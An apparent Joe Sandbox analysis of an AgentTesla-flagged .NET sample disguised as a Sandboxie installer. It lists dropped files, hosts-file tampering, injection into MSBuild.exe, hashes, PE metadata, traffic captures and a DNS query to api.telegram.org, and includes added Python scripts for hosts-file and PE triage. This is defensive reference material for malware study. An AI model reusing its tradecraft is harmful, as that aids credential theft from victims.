                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                      Process:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):841
                                                      Entropy (8bit):5.356220854328477
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoIvEE4xDqE4j:MxHKXwYHKhQnoPtHoxHwvEHxDqHj
                                                      MD5:486580834B084C92AE1F3866166C9C34
                                                      SHA1:C8EB7E1CEF55A6C9EB931487E9AA4A2098AACEDF
                                                      SHA-256:65C5B1213E371D449E2A239557A5F250FEA1D3473A1B5C4C5FF7492085F663FB
                                                      SHA-512:2C54B638A52AA87F47CAB50859EFF98F07DA02993A596686B5617BA99E73ABFCD104F0F33209E24AFB32E66B4B8A225D4DB2CC79631540C21E7E8C4573DFD457
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:modified
                                                      Size (bytes):261728
                                                      Entropy (8bit):6.1750840449797675
                                                      Encrypted:false
                                                      SSDEEP:3072:Mao0QHGUQWWimj9q/NLpj/WWqvAw2XpFU4rwOe4ubZSif02RFi/x2uv9FeP:boZTTWxxqVpqWVRXfr802biprVu
                                                      MD5:D621FD77BD585874F9686D3A76462EF1
                                                      SHA1:ABCAE05EE61EE6292003AABD8C80583FA49EDDA2
                                                      SHA-256:2CA7CF7146FB8209CF3C6CECB1C5AA154C61E046DC07AFA05E8158F2C0DDE2F6
                                                      SHA-512:2D85A81D708ECC8AF9A1273143C94DA84E632F1E595E22F54B867225105A1D0A44F918F0FAE6F1EB15ECF69D75B6F4616699776A16A2AA8B5282100FD15CA74C
                                                      Malicious:true
Antivirus:
• Antivirus: Virustotal, Detection: 0%
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
                                                      Reputation:moderate, very likely benign file
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z.........."...0..|...B......n.... ........@.. ....................................`.....................................O........>..............`>.......................................................... ............... ..H............text....z... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B................P.......H.......8)...................|.........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):835
                                                      Entropy (8bit):4.694294591169137
                                                      Encrypted:false
                                                      SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                      MD5:6EB47C1CF858E25486E42440074917F2
                                                      SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                      SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                      SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                      Malicious:true
                                                      Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
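The preview above is the stock Windows hosts file header (every line commented out) followed by an appended 127.0.0.1 line whose host name is cut off on this page. A quick way to tell a stock hosts file from a tampered one, as an added example that is not part of the Joe Sandbox report: strip comments, parse the active mappings, and flag names that are sinkholed to loopback or 0.0.0.0. Both files below are constructed; the example.invalid names stand in for whatever the sample appended, which the page does not show.

```python
"""Hosts-file triage: list active mappings and flag loopback/null sinkholes.

Added example, not part of the Joe Sandbox report. Both inputs are constructed:
the stock Windows header is reproduced from the preview, the appended host names
are placeholders because the real ones are truncated on the page.
"""
import ipaddress

# Constructed: the stock header. Windows ships with localhost commented out, so a
# genuine default hosts file parses to zero active entries.
DEFAULT_HOSTS = (
    "# Copyright (c) 1993-2009 Microsoft Corp.\r\n"
    "#\r\n"
    "# localhost name resolution is handled within DNS itself.\r\n"
    "#\t127.0.0.1       localhost\r\n"
    "#\t::1             localhost\r\n"
)

# Constructed: the same header with two lines appended, the pattern a stealer uses
# to cut off vendor update or telemetry domains. Names are placeholders.
TAMPERED_HOSTS = DEFAULT_HOSTS + (
    "127.0.0.1 updates.example.invalid   # inline comment is ignored\r\n"
    "::1 telemetry.example.invalid\r\n"
)


def parse_hosts(text: str) -> list[tuple[str, str]]:
    """Return (ip, hostname) pairs for every active mapping, one per hostname.

    Comments (# to end of line) and blank lines are dropped; a line whose first
    field is not an IP address is skipped, as the resolver would skip it."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        ip, names = fields[0], fields[1:]
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue
        for name in names:
            entries.append((ip, name.lower()))
    return entries


def sinkholed_entries(entries: list[tuple[str, str]]) -> list[tuple[str, str]]:
    """Mappings that send a name nowhere: loopback (127.0.0.0/8, ::1) or the
    unspecified address 0.0.0.0. 'localhost' itself is the one legitimate case."""
    flagged = []
    for ip, name in entries:
        addr = ipaddress.ip_address(ip)
        if (addr.is_loopback or addr.is_unspecified) and name != "localhost":
            flagged.append((ip, name))
    return flagged


def has_active_entries(text: str) -> bool:
    """True when the file differs from the stock Windows file by at least one live mapping."""
    return bool(parse_hosts(text))


if __name__ == "__main__":
    print("stock file modified:", has_active_entries(DEFAULT_HOSTS))
    print("tampered file modified:", has_active_entries(TAMPERED_HOSTS))
    for ip, name in sinkholed_entries(parse_hosts(TAMPERED_HOSTS)):
        print(f"sinkholed: {name} -> {ip}")
```

The size field is a cheap first check before parsing: the stock file is all comments, so any file larger than the header it started from has had lines appended, and the parser above tells you what they were.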
                                                      Process:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):298
                                                      Entropy (8bit):4.943030742860529
                                                      Encrypted:false
                                                      SSDEEP:6:zx3M1tFAbQtU1R30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13I30ZMt9BFN+QdCT2UftCM+
                                                      MD5:6A9888952541A41F033EB114C24DC902
                                                      SHA1:41903D7C8F31013C44572E09D97B9AAFBBCE77E6
                                                      SHA-256:41A61D0084CD7884BEA1DF02ED9213CB8C83F4034F5C8156FC5B06D6A3E133CE
                                                      SHA-512:E6AC898E67B4052375FDDFE9894B26D504A7827917BF3E02772CFF45C3FA7CC5E0EFFDC701D208E0DB89F05E42F195B1EC890F316BEE5CB8239AB45444DAA65E
                                                      Malicious:false
                                                      Preview:Microsoft (R) Build Engine version 4.7.3056.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.963790862015621
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                                                      File size:689664
                                                      MD5:5d5f37a7cf3a9ff4277b3a9dc2c4b9d2
                                                      SHA1:1a115c8a1761ef2a2cf61d854d1d2c201c902d53
                                                      SHA256:31941c96fa470de35d08fd8bdc215c2ff2cbeb82dd72e91aafa563c08af7c969
                                                      SHA512:64d959d7bc5987822a6639bb475280a7f6969c520d64e2b9d03cd3a776e4d74c0d350cc1388cff293dc9c546646860a32de3fd912ea3d2c4ae1d5047af9afc82
                                                      SSDEEP:12288:22L2IOI6QPAc9lIZx2tDPG2xMN1HHG05LZ524R8douFvjkntY9DTVYCsK5iZ1:22j6gz92AtDPGaMnnRBZ7+1F70481Z
                                                      TLSH:8DE4126C66C64332EF7931F3F2F2498127367D6EB032E289ECA212DDC9927431555A27
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$2................0..>...F......:]... ...`....@.. ...............................x....@................................
                                                      Icon Hash:0b3b5bb333d38963
                                                      Entrypoint:0x4a5d3a
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0xCED63224 [Mon Dec 18 16:53:56 2079 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al (repeated 97 times: the bytes following the stub are zero padding, which the disassembler decodes as this instruction; 0x402000 is the IAT entry for mscoree.dll!_CorExeMain listed below)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa5ce8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa6000 | 0x420e | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xac000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa5ccc | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa3d40 | 0xa3e00 | False | 0.965679526602 | data | 7.97974117818 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xa6000 | 0x420e | 0x4400 | False | 0.284122242647 | data | 5.03040094587 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xac000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0xa61a8 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0xa6610 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294111472, next used block 4294178293 | |
RT_ICON | 0xa76b8 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294177779, next used block 4294111986 | |
RT_GROUP_ICON | 0xa9c60 | 0x30 | data | |
RT_VERSION | 0xa9c90 | 0x394 | data | |
RT_MANIFEST | 0xaa024 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2020-2021 by David Xanatos (xanasoft.com)
Assembly Version | 1.0.0.0
InternalName | Generic.exe
FileVersion | 1.0.0.0
CompanyName | sandboxie-plus.com
LegalTrademarks |
Comments |
ProductName | Sandboxie
ProductVersion | 1.0.0.0
FileDescription | Sandboxie Installer
OriginalFilename | Generic.exe
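The header, section and version-information values above support a first static triage before the sample is ever run: a link timestamp in 2079, a .text section at 7.98 bits per byte of entropy, and vendor metadata (Sandboxie, sandboxie-plus.com) on a file that carries no digital signature. The script below is an added example, not part of the Joe Sandbox report or of any vendor tooling. It decodes the TimeDateStamp, computes Shannon entropy (run here over constructed buffers, since the binary itself is not reproduced on this page), applies a packed-code heuristic to the section table copied from above, and checks the version-information claim against the missing Authenticode signature. The 7.5 bits/byte threshold and the analysis date of 4 May 2022 (taken from the network capture) are assumptions.

```python
"""Static triage over the PE facts listed above.

Added example, not part of the Joe Sandbox report. The section rows, the
timestamp and the version-info fields are copied from the tables on this page;
the byte buffers fed to the entropy routine are constructed, because the sample
itself is not reproduced here.
"""
import math
from collections import Counter
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# Assumption: the day the sandbox ran the sample (first packet in the capture).
ANALYSIS_DATE = datetime(2022, 5, 4, tzinfo=timezone.utc)
# Assumption: bits/byte at or above which an executable section looks compressed or encrypted.
PACKED_THRESHOLD = 7.5

# From the section table: (name, entropy, characteristics)
SECTIONS = [
    (".text", 7.97974117818, "IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ"),
    (".rsrc", 5.03040094587, "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
    (".reloc", 0.101910425663, "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ"),
]

# From the version-information table and the "Digitally signed" field.
VERSION_INFO = {
    "CompanyName": "sandboxie-plus.com",
    "ProductName": "Sandboxie",
    "FileDescription": "Sandboxie Installer",
    "OriginalFilename": "Generic.exe",
}
DIGITALLY_SIGNED = False


def pe_timestamp(raw: int) -> datetime:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since 1970-01-01 UTC. Using a
    timedelta keeps far-future values clear of platform limits in fromtimestamp()."""
    return EPOCH + timedelta(seconds=raw)


def timestamp_untrustworthy(raw: int, observed: datetime = ANALYSIS_DATE) -> bool:
    """A link time later than the day the file was observed cannot be genuine.
    Deterministic .NET builds store a content hash in this field, so the verdict is
    'do not rely on the stamp', not 'hand-edited by the attacker'."""
    ts = pe_timestamp(raw)
    return ts > observed or ts.year < 1995


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def packed_code_sections(sections, threshold: float = PACKED_THRESHOLD) -> list[str]:
    """Executable sections at or above the threshold. Plain native code and CIL sit
    well below it, so these are the sections a packer or crypter has filled."""
    return [name for name, entropy, chars in sections
            if entropy >= threshold and "IMAGE_SCN_MEM_EXECUTE" in chars]


def version_info_findings(info: dict, signed: bool) -> list[str]:
    """Version resources are free-form text; only an Authenticode signature binds them
    to a vendor. Unsigned plus vendor-looking metadata is a triage finding."""
    findings = []
    vendor = info.get("CompanyName") or info.get("ProductName")
    if vendor and not signed:
        findings.append(f"claims vendor '{vendor}' but carries no Authenticode signature")
    return findings


def triage(timestamp_raw: int, sections, info: dict, signed: bool) -> list[str]:
    findings = []
    if timestamp_untrustworthy(timestamp_raw):
        findings.append(f"timestamp {pe_timestamp(timestamp_raw):%Y-%m-%d %H:%M:%S} UTC is not plausible")
    for name in packed_code_sections(sections):
        findings.append(f"code section {name} has packed-level entropy")
    findings.extend(version_info_findings(info, signed))
    return findings


if __name__ == "__main__":
    for line in triage(0xCED63224, SECTIONS, VERSION_INFO, DIGITALLY_SIGNED):
        print("-", line)
    # Constructed buffers to exercise the entropy routine at both ends of the scale.
    print("all zero:", shannon_entropy(bytes(100)))
    print("every byte once:", shannon_entropy(bytes(range(256))))
```

On a real file the section entropies come from the raw section bytes (pefile's `SectionStructure.get_entropy()` computes the same quantity); the heuristic is only a pointer to where the next layer lives, which here matches the report's observation that the sample unpacks and injects a second .NET assembly into MSBuild.exe.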
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2022 14:37:14.472268105 CEST | 49717 | 443 | 192.168.2.4 | 131.253.33.200
May 4, 2022 14:37:14.472575903 CEST | 49717 | 443 | 192.168.2.4 | 131.253.33.200
May 4, 2022 14:37:14.472666979 CEST | 49717 | 443 | 192.168.2.4 | 131.253.33.200
May 4, 2022 14:37:14.472697973 CEST | 49717 | 443 | 192.168.2.4 | 131.253.33.200
May 4, 2022 14:37:14.472771883 CEST | 49717 | 443 | 192.168.2.4 | 131.253.33.200
May 4, 2022 14:37:14.472793102 CEST | 49717 | 443 | 192.168.2.4 | 131.253.33.200
May 4, 2022 14:37:14.472851038 CEST | 49717 | 443 | 192.168.2.4 | 131.253.33.200
May 4, 2022 14:37:14.472878933 CEST | 49717 | 443 | 192.168.2.4 | 131.253.33.200
May 4, 2022 14:37:14.472929001 CEST | 49717 | 443 | 192.168.2.4 | 131.253.33.200
May 4, 2022 14:37:14.496618986 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496674061 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496701956 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496731997 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496757984 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496786118 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496814013 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496839046 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496865988 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496892929 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496920109 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496948957 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.496974945 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497000933 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497029066 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497054100 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497080088 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497107029 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497157097 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497261047 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497289896 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497315884 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497379065 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497409105 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497435093 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497618914 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497648001 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497674942 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497704029 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497733116 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497759104 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497786045 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497812986 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497894049 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497922897 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497951984 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.497977972 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498004913 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498033047 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498059034 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498137951 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498167038 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498193026 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498219967 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498248100 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498272896 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498337030 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498367071 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498393059 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498420954 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498447895 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498473883 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.498501062 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.499952078 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.499979973 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.500051022 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.500159025 CEST | 49717 | 443 | 192.168.2.4 | 131.253.33.200
May 4, 2022 14:37:14.500176907 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
May 4, 2022 14:37:14.500258923 CEST | 49717 | 443 | 192.168.2.4 | 131.253.33.200
May 4, 2022 14:37:14.554722071 CEST | 443 | 49717 | 131.253.33.200 | 192.168.2.4
                                                      May 4, 2022 14:37:14.554894924 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:25.098345995 CEST49741443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.098407984 CEST4434974140.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:25.098511934 CEST49741443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.098990917 CEST49741443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.099016905 CEST4434974140.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:25.144711018 CEST49743443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.144762039 CEST4434974340.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:25.144856930 CEST49743443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.145052910 CEST49743443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.145071030 CEST4434974340.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:25.710009098 CEST49748443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.710062027 CEST4434974840.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:25.710205078 CEST49748443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.710541964 CEST49748443192.168.2.440.126.31.4
                                                      May 4, 2022 14:37:25.710566998 CEST4434974840.126.31.4192.168.2.4
                                                      May 4, 2022 14:37:27.166102886 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:27.166165113 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:27.535794020 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:27.649444103 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:28.206187963 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:28.253160000 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:29.409497023 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:29.550045013 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:31.909598112 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:31.952646971 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:36.847651005 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:36.910098076 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:46.457775116 CEST4967280192.168.2.48.248.119.254
                                                      May 4, 2022 14:37:46.579255104 CEST4967380192.168.2.493.184.220.29
                                                      May 4, 2022 14:37:58.174837112 CEST49743443192.168.2.440.126.31.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2022 14:38:04.750358105 CEST | 60758 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2022 14:38:04.768125057 CEST | 53 | 60758 | 8.8.8.8 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2022 14:38:04.750358105 CEST | 192.168.2.4 | 8.8.8.8 | 0x9334 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)
